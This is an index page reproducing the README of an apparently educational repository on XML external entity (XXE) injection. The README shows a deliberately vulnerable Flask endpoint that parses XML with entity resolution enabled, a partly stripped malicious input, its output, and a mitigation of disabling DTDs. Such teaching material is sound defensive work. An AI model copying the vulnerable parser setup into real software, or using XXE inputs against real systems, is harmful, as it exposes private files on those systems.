Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/qeeqbox/xxe-injection

A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files
https://github.com/qeeqbox/xxe-injection

infosecsimplified injection metadata qeeqbox visualization vulnerability xee xml xxe xxe-injection

Last synced: 2 days ago
JSON representation

A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files

Awesome Lists containing this project

README 

        
 



A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files



## Example #1

1. Threat actor sends a malicious request that contains a reference to an external entity (a system identifier)

2. The target's XML processor replaces the external entity with the content dereferenced by the system identifier 



## Code

#### Target Logic 

```py

@app.route("/parse_xml",methods = ['POST'])

def parse_xml():

    parser = etree.XMLParser(resolve_entities=True)

    root = etree.fromstring(request.files['xml'].read(), parser)

    response = make_response(etree.tostring(root), 200)

    response.mimetype = "text/plain"

    return response

```



#### Target-in

```xml



John01

```



#### Target-Out

```

Jone Doe

```



#### Target-in

```xml



 ]>

&xxe;

```



#### Target-Out

```

usystem01

```



## Impact

High



## Names

- XXE injection

- XEE injection

- XML injection



## Risk

- Read data



## Redemption

- Secure processing

- Disable DTD and XML external entity



## ID

4b3566ce-3f7f-40d8-b882-09f59ca967b8



## References

- [wiki](https://en.wikipedia.org/wiki/XML_external_entity_attack)